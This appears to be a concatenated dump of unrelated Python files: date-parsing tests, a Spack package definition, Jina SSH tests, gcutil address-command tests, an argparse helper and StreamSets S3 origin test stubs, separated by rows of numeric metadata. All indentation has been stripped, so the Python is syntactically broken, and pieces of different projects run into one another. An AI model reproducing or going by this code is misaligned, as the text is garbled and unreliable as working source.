date = DateValue.parse("1967 B.C.")
self.assertIsInstance(date, DateValueSimple)
self.assertEqual(date.kind, DateValueTypes.SIMPLE)
self.assertEqual(date.date, GregorianDate(1967, bc=True))
self.assertEqual(str(date), "1967 B.C.")
date = DateValue.parse("@#DGREGORIAN@ 1 JAN 2017")
self.assertIsInstance(date, DateValueSimple)
self.assertEqual(date.kind, DateValueTypes.SIMPLE)
self.assertEqual(date.date, GregorianDate(2017, "JAN", 1))
self.assertEqual(str(date), "1 JAN 2017")
def test_017_date_cmp(self):
"""Test date.Date class."""
dv = DateValue.parse("2016")
self.assertIsInstance(dv.key(), tuple)
self.assertEqual(dv.key(), (GregorianDate(2016), GregorianDate(2016)))
dv = DateValue.parse("31 DEC 2000")
self.assertIsInstance(dv.key(), tuple)
self.assertEqual(dv.key(), (GregorianDate(2000, "DEC", 31), GregorianDate(2000, "DEC", 31)))
dv = DateValue.parse("BET 31 DEC 2000 AND 1 JAN 2001")
self.assertIsInstance(dv.key(), tuple)
self.assertEqual(dv.key(), (GregorianDate(2000, "DEC", 31), GregorianDate(2001, "JAN", 1)))
# end date deliberately precedes start date; key() keeps the parsed order
dv = DateValue.parse("BET 31 DEC 2000 AND 1 JAN 2000")
self.assertIsInstance(dv.key(), tuple)
self.assertEqual(dv.key(), (GregorianDate(2000, "DEC", 31), GregorianDate(2000, "JAN", 1)))
self.assertTrue(DateValue.parse("2016") < DateValue.parse("2017"))
self.assertTrue(DateValue.parse("2 JAN 2016") > DateValue.parse("1 JAN 2016"))
self.assertTrue(DateValue.parse("BET 1900 AND 2000") < DateValue.parse("FROM 1920 TO 1999"))
# comparing simple date with range
self.assertTrue(DateValue.parse("1 JAN 2000") > DateValue.parse("BET 1 JAN 1999 AND 1 JAN 2000"))
self.assertNotEqual(DateValue.parse("1 JAN 2000"), DateValue.parse("BET 1 JAN 2000 AND 1 JAN 2001"))
self.assertTrue(DateValue.parse("1 JAN 2000") < DateValue.parse("BET 1 JAN 2000 AND 1 JAN 2001"))
self.assertTrue(DateValue.parse("1 JAN 2000") > DateValue.parse("BEF 1 JAN 2000"))
self.assertTrue(DateValue.parse("1 JAN 2000") > DateValue.parse("TO 1 JAN 2000"))
self.assertTrue(DateValue.parse("1 JAN 2000") < DateValue.parse("AFT 1 JAN 2000"))
self.assertTrue(DateValue.parse("1 JAN 2000") < DateValue.parse("FROM 1 JAN 2000"))
# comparing ranges
self.assertEqual(DateValue.parse("FROM 1 JAN 2000 TO 1 JAN 2001"),
DateValue.parse("BET 1 JAN 2000 AND 1 JAN 2001"))
self.assertTrue(DateValue.parse("FROM 1 JAN 1999 TO 1 JAN 2001") <
DateValue.parse("BET 1 JAN 2000 AND 1 JAN 2001"))
self.assertTrue(DateValue.parse("FROM 1 JAN 2000 TO 1 JAN 2002") >
DateValue.parse("BET 1 JAN 2000 AND 1 JAN 2001"))
# Less specific date compares later than more specific
self.assertTrue(DateValue.parse("2000") > DateValue.parse("31 DEC 2000"))
self.assertTrue(DateValue.parse("DEC 2000") > DateValue.parse("31 DEC 2000"))
# phrase is always later than any regular date
self.assertTrue(DateValue.parse("(Could be 1996 or 1998)") > DateValue.parse("2000"))
# "empty" date is always later than any regular date
self.assertTrue(DateValue.parse("") > DateValue.parse("2000"))
def test_018_date_parse_empty(self):
"""Test date.DateValue class."""
for value in (None, ""):
date = DateValue.parse(value)
self.assertIsInstance(date, DateValuePhrase)
self.assertEqual(date.kind, DateValueTypes.PHRASE)
self.assertIsNone(date.phrase)
self.assertEqual(str(date), "")
def test_019_date_value_visitor(self):
"""Test date.DateValue class."""
visitor = TestDateVisitor()
date1 = GregorianDate(2017, "JAN", 1)
date2 = GregorianDate(2017, "DEC", 31)
value = DateValueSimple(date1).accept(visitor)
self.assertEqual(value, ("simple", date1))
value = DateValueFrom(date1).accept(visitor)
self.assertEqual(value, ("from", date1))
value = DateValueTo(date1).accept(visitor)
self.assertEqual(value, ("to", date1))
value = DateValuePeriod(date1, date2).accept(visitor)
self.assertEqual(value, ("period", date1, date2))
value = DateValueBefore(date1).accept(visitor)
self.assertEqual(value, ("before", date1))
value = DateValueAfter(date1).accept(visitor)
self.assertEqual(value, ("after", date1))
value = DateValueRange(date1, date2).accept(visitor)
self.assertEqual(value, ("range", date1, date2))
value = DateValueAbout(date1).accept(visitor)
self.assertEqual(value, ("about", date1))
value = DateValueCalculated(date1).accept(visitor)
self.assertEqual(value, ("calculated", date1))
value = DateValueEstimated(date1).accept(visitor)
self.assertEqual(value, ("estimated", date1))
value = DateValueInterpreted(date1, "phrase").accept(visitor)
self.assertEqual(value, ("interpreted", date1, "phrase"))
value = DateValuePhrase("phrase").accept(visitor)
self.assertEqual(value, ("phrase", "phrase"))
def test_020_date_hash(self):
"""Test date.Date hash"""
dv1 = DateValue.parse("2016")
dv2 = DateValue.parse("2016")
self.assertEqual(hash(dv1), hash(dv2))
dv1 = DateValue.parse("31 DEC 2000")
dv2 = DateValue.parse("31 DEC 2000")
self.assertEqual(hash(dv1), hash(dv2))
dv1 = DateValue.parse("BET 31 DEC 2000 AND 1 JAN 2001")
dv2 = DateValue.parse("BET 31 DEC 2000 AND 1 JAN 2001")
self.assertEqual(hash(dv1), hash(dv2))
| 41.356784 | 108 | 0.637708 | 2,825 | 24,690 | 5.540177 | 0.095221 | 0.147594 | 0.127468 | 0.029519 | 0.685515 | 0.588844 | 0.440419 | 0.387196 | 0.343684 | 0.308223 | 0 | 0.067049 | 0.22981 | 24,690 | 596 | 109 | 41.426175 | 0.755995 | 0.047833 | 0 | 0.314943 | 0 | 0 | 0.096256 | 0 | 0 | 0 | 0 | 0 | 0.565517 | 1 | 0.075862 | false | 0 | 0.006897 | 0 | 0.124138 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 1 | 7ce4ea0979a0d8bcdfade749e59f8ad94da264f2 | 3,487 | py | Python | var/spack/repos/builtin/packages/visionary-dev-tools/package.py | electronicvisions/spack | d6121eb35b4948f7d8aef7ec7a305a5123a7439e | ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"] | 2 | 2019-02-10T13:47:48.000Z | 2019-04-17T13:05:17.000Z | var/spack/repos/builtin/packages/visionary-dev-tools/package.py | einc-eu/spack | 15468b92ed21d970c0111ae19144e85e66746433 | ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"] | 8 | 2021-05-28T06:39:59.000Z | 2022-03-30T15:12:35.000Z | var/spack/repos/builtin/packages/visionary-dev-tools/package.py | einc-eu/spack | 15468b92ed21d970c0111ae19144e85e66746433 | ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"] | 2 | 2018-04-06T09:04:11.000Z | 2020-01-24T12:52:12.000Z |
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *

import os.path as osp
class VisionaryDevTools(Package):
"""Developer convenience packages common to all visionary
development meta packages. Application specific build tools belong
to the dedicated meta packages."""
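# Usage sketch (assuming a working Spack installation on PATH):
#   $ spack install visionary-dev-tools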
homepage = ''
# some random tarball, to make `spack fetch --dependencies visionary-defaults` work
url = 'https://github.com/electronicvisions/spack/archive/v0.8.tar.gz'
# This is only a dummy tarball (see difference between version numbers)
# TODO: as soon as a MetaPackage-concept has been merged, please update this package
version('1.0', '372ce038842f20bf0ae02de50c26e85d', url='https://github.com/electronicvisions/spack/archive/v0.8.tar.gz')
depends_on('ack')
depends_on('autoconf')
depends_on('automake')
depends_on('bash-completion')
depends_on('bazel')
depends_on('bear')
depends_on('cairo +X')
depends_on('cloc')
depends_on('cmake')
depends_on('connect-proxy')
depends_on('cppcheck +htmlreport')
depends_on('cquery')
depends_on('doxygen+graphviz')
depends_on('emacs ~X')
depends_on('gdb')
depends_on('genpybind')
depends_on('git+tcltk')
depends_on('git-fat-git')
depends_on('gtkplus')
depends_on('imagemagick')
depends_on('jq')
depends_on('libpcap')
depends_on('libtool')
depends_on('llvm+visionary+python~libcxx build_type=Release')
depends_on('mercurial')
depends_on('mosh')
depends_on('munge')
depends_on('ncdu')
depends_on('node-js')
depends_on('octave+fftw')
depends_on('openssh')
depends_on('pigz')
depends_on('pkg-config')
depends_on('py-autopep8')
depends_on('py-black', when="^python@3.6.0:")
depends_on('py-configargparse')
depends_on('py-doxypypy')
depends_on('py-flake8')
depends_on('py-gdbgui')
depends_on('py-git-review')
depends_on('py-ipython')
depends_on('py-jedi')
depends_on('py-junit-xml')
depends_on('py-language-server')
depends_on('py-line-profiler')
depends_on('py-nose')
depends_on('py-nose2')
depends_on('py-memory-profiler')
depends_on('py-pudb')
depends_on('py-pylint@:1.999.999', when="^python@:2.999.999")
depends_on('py-pylint', when="^python@3.4.0:")
depends_on('py-pyserial')
depends_on('py-pytest')
depends_on('py-pytest-xdist')
depends_on('py-ranger-fm')
depends_on('py-sqlalchemy')
depends_on('py-virtualenv')
depends_on('py-xmlrunner')
depends_on('py-yq')
depends_on('rtags')
depends_on('tar')
depends_on('texinfo')
# ECM (2020-05-14): removed 'the-silver-searcher' due to build fail on gcc@10.1.0
depends_on('tig')
depends_on('time')
depends_on('tmux')
depends_on('units')
depends_on('valgrind')
depends_on('verilator')
depends_on('vim +python +ruby +perl +cscope +huge +x')
depends_on('visionary-xilinx')
depends_on('wget')
depends_on('yaml-cpp+shared')
depends_on('zsh')
def install(self, spec, prefix):
mkdirp(prefix.etc)
# store a copy of this package.
filename = osp.basename(osp.dirname(__file__)) # gives name of parent folder
install(__file__, join_path(prefix.etc, filename + '.py'))
# we could create some filesystem view here?
| 33.854369 | 124 | 0.677086 | 474 | 3,487 | 4.805907 | 0.478903 | 0.288411 | 0.125549 | 0.014925 | 0.04741 | 0.04741 | 0.04741 | 0.04741 | 0.04741 | 0.04741 | 0 | 0.024756 | 0.177516 | 3,487 | 102 | 125 | 34.186275 | 0.769526 | 0.217666 | 0 | 0 | 0 | 0 | 0.34507 | 0.022239 | 0 | 0 | 0 | 0.009804 | 0 | 1 | 0.012195 | false | 0 | 0.012195 | 0 | 0.060976 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 1 | 7ceab378038506dba92e4b8d3ecd8a07fc74f4a2 | 1,469 | py | Python | tests/unit/peapods/runtimes/remote/ssh/test_ssh_remote.py | yk/jina | ab66e233e74b956390f266881ff5dc4e0110d3ff | ["Apache-2.0"] | 1 | 2020-12-23T12:34:00.000Z | 2020-12-23T12:34:00.000Z | tests/unit/peapods/runtimes/remote/ssh/test_ssh_remote.py | yk/jina | ab66e233e74b956390f266881ff5dc4e0110d3ff | ["Apache-2.0"] | null | null | null | tests/unit/peapods/runtimes/remote/ssh/test_ssh_remote.py | yk/jina | ab66e233e74b956390f266881ff5dc4e0110d3ff | ["Apache-2.0"] | null | null | null |
import pytest
from jina.enums import RemoteAccessType
from jina.flow import Flow
from jina.parser import set_pea_parser, set_pod_parser
from jina.peapods.pods import BasePod
from jina.peapods.runtimes.remote.ssh import SSHRuntime
from jina.proto import jina_pb2
@pytest.mark.skip('works locally, but until I find out how to mock ssh, this has to be skipped')
def test_ssh_pea():
p = set_pea_parser().parse_args(['--host', 'pi@172.16.1.110', '--timeout', '5000'])
with SSHRuntime(p, kind='pea') as pp:
assert pp.status.envelope.status.code == jina_pb2.StatusProto.READY
assert pp.status is None
@pytest.mark.skip('works locally, but until I find out how to mock ssh, this has to be skipped')
def test_ssh_pod():
p = set_pod_parser().parse_args(['--host', 'pi@172.16.1.110', '--timeout', '5000'])
with SSHRuntime(p, kind='pod') as pp:
assert pp.status.envelope.status.code == jina_pb2.StatusProto.READY
assert pp.status is None
@pytest.mark.skip('not implemented yet')
def test_ssh_mutable_pod():
p = set_pod_parser().parse_args(['--host', 'pi@172.16.1.110', '--timeout', '5000'])
p = BasePod(p)
with SSHRuntime(p, kind='pod') as pp:
assert pp.status.envelope.status.code == jina_pb2.StatusProto.READY
assert pp.status is None
@pytest.mark.skip('not implemented yet')
def test_flow():
f = Flow().add().add(host='pi@172.16.1.110', remote_access=RemoteAccessType.SSH)
with f:
pass
| 32.644444 | 96 | 0.701157 | 235 | 1,469 | 4.27234 | 0.297872 | 0.047809 | 0.083665 | 0.043825 | 0.681275 | 0.681275 | 0.666335 | 0.666335 | 0.610558 | 0.610558 | 0 | 0.042037 | 0.157931 | 1,469 | 44 | 97 | 33.386364 | 0.769604 | 0 | 0 | 0.451613 | 0 | 0 | 0.21307 | 0 | 0 | 0 | 0 | 0 | 0.193548 | 1 | 0.129032 | false | 0.032258 | 0.225806 | 0 | 0.354839 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 1 | 7cf38c52d649f28843e5da3730409c34a52dc82f | 8,026 | py | Python | platform/gcutil/lib/google_compute_engine/gcutil_lib/address_cmds_test.py | IsaacHuang/google-cloud-sdk | 52afa5d1a75dff08f4f5380c5cccc015bf796ca5 | ["Apache-2.0"] | null | null | null | platform/gcutil/lib/google_compute_engine/gcutil_lib/address_cmds_test.py | IsaacHuang/google-cloud-sdk | 52afa5d1a75dff08f4f5380c5cccc015bf796ca5 | ["Apache-2.0"] | null | null | null | platform/gcutil/lib/google_compute_engine/gcutil_lib/address_cmds_test.py | IsaacHuang/google-cloud-sdk | 52afa5d1a75dff08f4f5380c5cccc015bf796ca5 | ["Apache-2.0"] | 2 | 2020-07-25T05:03:06.000Z | 2020-11-04T04:55:57.000Z |
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for address collection commands."""
import path_initializer
path_initializer.InitSysPath()
import json
import unittest
import gflags as flags
from gcutil_lib import address_cmds
from gcutil_lib import gcutil_unittest
from gcutil_lib import mock_api
from gcutil_lib import mock_lists
FLAGS = flags.FLAGS
class AddressCmdsTest(gcutil_unittest.GcutilTestCase):
def setUp(self):
self.mock, self.api = mock_api.CreateApi(self.version)
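# Pattern used throughout: register a canned reply with self.mock.Respond(...)
# and inspect the request the command actually sent via call.GetRequest().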
def testReserveAddressPromptsForRegion(self):
expected_project = 'test_project'
expected_address = 'test_address'
expected_description = 'test address'
expected_region = 'test-region'
expected_source_address = '123.123.123.1'
set_flags = {
'project': expected_project,
'description': expected_description,
'source_address': expected_source_address,
}
command = self._CreateAndInitializeCommand(
address_cmds.ReserveAddress, 'reserveaddress', set_flags=set_flags)
mock_lists.GetSampleRegionListCall(
command, self.mock, num_responses=1, name=[expected_region])
call = self.mock.Respond('compute.addresses.insert', {})
command.Handle(expected_address)
request = call.GetRequest()
self.assertEqual('POST', request.method)
self.assertEqual(expected_project, request.parameters['project'])
self.assertEqual(expected_region, request.parameters['region'])
body = json.loads(request.body)
self.assertEqual(body['name'], expected_address)
self.assertEqual(body['description'], expected_description)
self.assertEqual(body['address'], expected_source_address)
def testReserveAddressGeneratesCorrectRequest(self):
expected_project = 'test_project'
expected_address = 'test_address'
expected_description = 'test address'
submitted_region = 'test-region'
expected_source_address = '123.123.123.1'
set_flags = {
'project': expected_project,
'description': expected_description,
'region': submitted_region,
'source_address': expected_source_address,
}
command = self._CreateAndInitializeCommand(
address_cmds.ReserveAddress, 'reserveaddress', set_flags=set_flags)
call = self.mock.Respond('compute.addresses.insert', {})
command.Handle(expected_address)
request = call.GetRequest()
self.assertEqual('POST', request.method)
self.assertEqual(expected_project, request.parameters['project'])
self.assertEqual(submitted_region, request.parameters['region'])
body = json.loads(request.body)
self.assertEqual(body['name'], expected_address)
self.assertEqual(body['description'], expected_description)
self.assertEqual(body['address'], expected_source_address)
def testGetAddressGeneratesCorrectRequest(self):
expected_project = 'test_project'
expected_address = 'test_address'
submitted_region = 'test-region'
set_flags = {
'project': expected_project,
'region': submitted_region,
}
command = self._CreateAndInitializeCommand(
address_cmds.GetAddress, 'getaddress', set_flags=set_flags)
call = self.mock.Respond('compute.addresses.get', {})
command.Handle(expected_address)
request = call.GetRequest()
self.assertEqual('GET', request.method)
self.assertEqual(None, request.body)
parameters = request.parameters
self.assertEqual(parameters['project'], expected_project)
self.assertEqual(parameters['region'], submitted_region)
self.assertEqual(parameters['address'], expected_address)
def testGetAddressPrintNonEmptyUsers(self):
expected_project = 'test_project'
submitted_region = 'test-region'
set_flags = {
'project': expected_project,
'region': submitted_region,
}
command = self._CreateAndInitializeCommand(
address_cmds.GetAddress, 'getaddress', set_flags=set_flags)
data = command.GetDetailRow({'users': ['fr-1', 'fr-2']})
expected_data = {
'v1': [
('users', ['fr-1', 'fr-2'])
],
}
self.assertEqual(
gcutil_unittest.SelectTemplateForVersion(
expected_data, command.api.version),
data)
def testGetAddressPrintEmptyUsers(self):
expected_project = 'test_project'
submitted_region = 'test-region'
set_flags = {
'project': expected_project,
'region': submitted_region,
}
command = self._CreateAndInitializeCommand(
address_cmds.GetAddress, 'getaddress', set_flags=set_flags)
data = command.GetDetailRow({'users': []})
expected_data = {
'v1': [
('users', [])
],
}
self.assertEqual(
gcutil_unittest.SelectTemplateForVersion(
expected_data, command.api.version),
data)
def testReleaseAddressGeneratesCorrectRequest(self):
expected_project = 'test_project'
expected_address = 'test_address'
submitted_region = 'test-region'
set_flags = {
'project': expected_project,
'region': submitted_region,
}
command = self._CreateAndInitializeCommand(
address_cmds.ReleaseAddress, 'releaseaddress', set_flags=set_flags)
call = self.mock.Respond('compute.addresses.delete', {})
command.Handle(expected_address)
request = call.GetRequest()
self.assertEqual('DELETE', request.method)
self.assertEqual(None, request.body)
parameters = request.parameters
self.assertEqual(parameters['project'], expected_project)
self.assertEqual(parameters['region'], submitted_region)
self.assertEqual(parameters['address'], expected_address)
def testReleaseAddressWithoutRegionFlag(self):
expected_project = 'test_project'
expected_region = 'test-region'
expected_address = 'test_address'
address = ('projects/%s/regions/%s/addresses/%s' %
(expected_project, expected_region, expected_address))
set_flags = {
'project': 'incorrect_project',
}
command = self._CreateAndInitializeCommand(
address_cmds.ReleaseAddress, 'releaseaddress', set_flags=set_flags)
call = self.mock.Respond('compute.addresses.delete', {})
command.Handle(address)
request = call.GetRequest()
self.assertEqual('DELETE', request.method)
self.assertEqual(None, request.body)
parameters = request.parameters
self.assertEqual(parameters['project'], expected_project)
self.assertEqual(parameters['region'], expected_region)
self.assertEqual(parameters['address'], expected_address)
def testReleaseMultipleAddresses(self):
expected_project = 'test_project'
expected_addresses = [
'test-addresses-%02d' % x for x in xrange(100)]
set_flags = {
'project': expected_project,
'region': 'region-a',
}
command = self._CreateAndInitializeCommand(
address_cmds.ReleaseAddress, 'releaseaddress', set_flags=set_flags)
calls = [self.mock.Respond('compute.addresses.delete', {})
for x in xrange(len(expected_addresses))]
_, exceptions = command.Handle(*expected_addresses)
self.assertEqual(0, len(exceptions))
sorted_calls = sorted([call.GetRequest().parameters['address'] for
call in calls])
self.assertEqual(expected_addresses, sorted_calls)
if __name__ == '__main__':
unittest.main(testLoader=gcutil_unittest.GcutilLoader())
| 32.362903 | 75 | 0.705457 | 825 | 8,026 | 6.66303 | 0.193939 | 0.068219 | 0.040022 | 0.033473 | 0.698563 | 0.681281 | 0.652538 | 0.652538 | 0.64235 | 0.629252 | 0 | 0.006286 | 0.187391 | 8,026 | 247 | 76 | 32.493927 | 0.836553 | 0.076501 | 0 | 0.672316 | 0 | 0 | 0.128888 | 0.023803 | 0 | 0 | 0 | 0 | 0.175141 | 1 | 0.050847 | false | 0 | 0.045198 | 0 | 0.101695 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 1 | 7cfa416e684eef42a41f05552ac51704b017a9e1 | 1,471 | py | Python | arguments_setting.py | Projectoy/ml_framework | f3d37d632a1aec314eb186a3da6d174a5dc4beee | ["Apache-2.0"] | null | null | null | arguments_setting.py | Projectoy/ml_framework | f3d37d632a1aec314eb186a3da6d174a5dc4beee | ["Apache-2.0"] | null | null | null | arguments_setting.py | Projectoy/ml_framework | f3d37d632a1aec314eb186a3da6d174a5dc4beee | ["Apache-2.0"] | null | null | null |
import argparse, os
class ArgumentManager:
def __init__(self, model_list):
self.model_list = model_list
self.args = self.get_input_arguments()
self.validate_arguments()
def get_input_arguments(self):
parser = argparse.ArgumentParser(description='Run a model training/testing task.')
parser.add_argument("--configuration", "-c", required=True, help="the path of a configuration file(json type)")
parser.add_argument("--model", "-m", required=True, help="the model to process")
parser.add_argument("--task", "-t", required=True, help="training/testing")
return parser.parse_args()
def validate_arguments(self):
self.validate_configuration_path()
self.validate_model()
self.validate_task()
def validate_task(self):
task = self.args.task
assert task == "training" or task == "testing", "task should be training or testing"
def validate_model(self):
model = self.args.model
assert model in self.model_list, "model is not in the prepared model list"
def validate_configuration_path(self):
config_path = self.args.configuration
assert os.path.exists(config_path), "configuration path is inappropriate (not found file)"
def get_configuration_file_path(self):
return self.args.configuration
def get_model_type(self):
return self.args.model
def get_task_type(self):
return self.args.task
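# Usage sketch (hypothetical model list and file names):
#   manager = ArgumentManager(["cnn", "rnn"])
#   config_path = manager.get_configuration_file_path()
# invoked e.g. as: python main.py -c config.json -m cnn -t training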
| 36.775 | 119 | 0.680489 | 185 | 1,471 | 5.221622 | 0.302703 | 0.057971 | 0.040373 | 0.055901 | 0.045549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2155 | 1,471 | 40 | 120 | 36.775 | 0.837088 | 0 | 0 | 0 | 0 | 0 | 0.186821 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 1 | 0.290323 | false | 0 | 0.032258 | 0.096774 | 0.483871 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 1 | 7cfaab0b77af0b6c7c138ff09a0a82244c391f57 | 12,133 | py | Python | stage/configuration/test_amazon_s3_origin.py | Sentienz/datacollector-tests | ca27988351dc3366488098b5db6c85a8be2f7b85 | ["Apache-2.0"] | null | null | null | stage/configuration/test_amazon_s3_origin.py | Sentienz/datacollector-tests | ca27988351dc3366488098b5db6c85a8be2f7b85 | ["Apache-2.0"] | null | null | null | stage/configuration/test_amazon_s3_origin.py | Sentienz/datacollector-tests | ca27988351dc3366488098b5db6c85a8be2f7b85 | ["Apache-2.0"] | 1 | 2019-10-29T08:46:11.000Z | 2019-10-29T08:46:11.000Z |
import logging
import pytest
from streamsets.testframework.markers import aws, sdc_min_version
from streamsets.testframework.utils import get_random_string
logger = logging.getLogger(__name__)
S3_SANDBOX_PREFIX = 'sandbox'
LOG_FIELD_MAPPING = [{'fieldPath': '/date', 'group': 1},
{'fieldPath': '/time', 'group': 2},
{'fieldPath': '/timehalf', 'group': 3},
{'fieldPath': '/info', 'group': 4},
{'fieldPath': '/file', 'group': 5},
{'fieldPath': '/message', 'group': 6}]
REGULAR_EXPRESSION = r'(\S+) (\S+) (\S+) (\S+) (\S+) (.*)'
# log lines to be written into the file on S3
data_format_content = {
'COMMON_LOG_FORMAT': '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] '
'"GET /apache.gif HTTP/1.0" 200 232',
'LOG4J': '200 [main] DEBUG org.StreamSets.Log4j unknown - This is sample log message',
'APACHE_ERROR_LOG_FORMAT': '[Wed Oct 11 14:32:52 2000] [error] [client 127.0.0.1] client '
'denied by server configuration:/export/home/live/ap/htdocs/test',
'COMBINED_LOG_FORMAT': '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache.gif'
' HTTP/1.0" 200 2326 "http://www.example.com/strt.html" "Mozilla/4.08'
' [en] (Win98; I ;Nav)"',
'APACHE_CUSTOM_LOG_FORMAT': '10.185.248.71 - - [09/Jan/2015:9:12:06 +0000] "GET '
'/inventoryServic/inventory/purchaseItem?userId=20253471&itemId=23434300 '
'HTTP/1.1" 500 17 ',
'CEF': '10.217.31.247 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=10.217.253.78 '
'spt=53743 method=GET request=http://vpx247.example.net/FFC/login.html msg=Disallow Illegal URL.',
'LEEF': 'LEEF: 2.0|Trend Micro|Deep Security Agent|<DSA version>|4000030|cat=Anti-Malware '
'name=HEU_AEGIS_CRYPT desc=HEU_AEGIS_CRYPT sev=6 cn1=241 msg=Realtime',
'REGEX': '2019-04-30 08:23:53 AM [INFO] [streamsets.sdk.sdc_api] Pipeline Filewriterpipeline53'}
# expected data to verify the output of the Amazon S3 origin.
get_data_to_verify_output = {
'LOG4J': {'severity': 'DEBUG', 'relativetime': '200', 'thread': 'main', 'category': 'org.StreamSets.Log4j',
'ndc': 'unknown', 'message': 'This is sample log message'},
'COMMON_LOG_FORMAT': {'request': '/apache.gif', 'auth': 'frank', 'ident': '-', 'response': '200', 'bytes':
'232', 'clientip': '127.0.0.1', 'verb': 'GET', 'httpversion': '1.0', 'rawrequest': None,
'timestamp': '10/Oct/2000:13:55:36 -0700'},
'APACHE_ERROR_LOG_FORMAT': {'message': 'client denied by server configuration:/export/home/live/ap/htdocs/'
'test', 'timestamp': 'Wed Oct 11 14:32:52 2000', 'loglevel': 'error',
'clientip': '127.0.0.1'},
'COMBINED_LOG_FORMAT': {'request': '/apache.gif', 'agent': '"Mozilla/4.08 [en] (Win98; I ;Nav)"', 'auth':
'frank', 'ident': '-', 'verb': 'GET', 'referrer': '"http://www.example.com/strt.'
'html"', 'response': '200', 'bytes': '2326', 'clientip': '127.0.0.1',
'httpversion': '1.0', 'rawrequest': None, 'timestamp': '10/Oct/2000:13:55:36 -0700'},
'APACHE_CUSTOM_LOG_FORMAT': {'remoteUser': '-', 'requestTime': '09/Jan/2015:9:12:06 +0000', 'request': 'GET '
'/inventoryServic/inventory/purchaseItem?userId=20253471&itemId=23434300 HTTP/1.1',
'logName': '-', 'remoteHost': '10.185.248.71', 'bytesSent': '17', 'status': '500'},
'CEF': {'severity': '6', 'product': 'NetScaler', 'extensions': {'msg': 'Disallow Illegal URL.', 'request':
'http://vpx247.example.net/FFC/login.html', 'method': 'GET', 'src': '10.217.253.78', 'spt': '53743'},
'signature': 'APPFW', 'vendor': 'Citrix', 'cefVersion': 0, 'name': 'APPFW_STARTURL',
'version': 'NS10.0'},
'GROK': {'request': '/inventoryServic/inventory/purchaseItem?userId=20253471&itemId=23434300', 'auth': '-',
'ident': '-', 'response': '500', 'bytes': '17', 'clientip': '10.185.248.71', 'verb': 'GET',
'httpversion': '1.1', 'rawrequest': None, 'timestamp': '09/Jan/2015:9:12:06 +0000'},
'LEEF': {'eventId': '4000030', 'product': 'Deep Security Agent', 'extensions': {'cat': 'Realtime'},
'leefVersion': 2.0, 'vendor': 'Trend Micro', 'version': '<DSA version>'},
'REGEX': {'/time': '08:23:53', '/date': '2019-04-30', '/timehalf': 'AM',
'/info': '[INFO]', '/message': 'Pipeline Filewriterpipeline53', '/file': '[streamsets.sdk.sdc_api]'}}
@pytest.mark.skip('Not yet implemented')
def test_configuration_access_key_id(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_bucket(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_connection_timeout(sdc_builder, sdc_executor):
pass
@pytest.mark.parametrize('task', ['CREATE_NEW_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_content(sdc_builder, sdc_executor, task):
pass
@pytest.mark.parametrize('task', ['COPY_OBJECT'])
@pytest.mark.parametrize('delete_original_object', [False, True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_delete_original_object(sdc_builder, sdc_executor, task, delete_original_object):
pass
@pytest.mark.parametrize('region', ['OTHER'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_endpoint(sdc_builder, sdc_executor, region):
pass
@pytest.mark.parametrize('task', ['COPY_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_new_object_path(sdc_builder, sdc_executor, task):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_object(sdc_builder, sdc_executor):
pass
@pytest.mark.parametrize('on_record_error', ['DISCARD', 'STOP_PIPELINE', 'TO_ERROR'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_on_record_error(sdc_builder, sdc_executor, on_record_error):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_preconditions(sdc_builder, sdc_executor):
pass
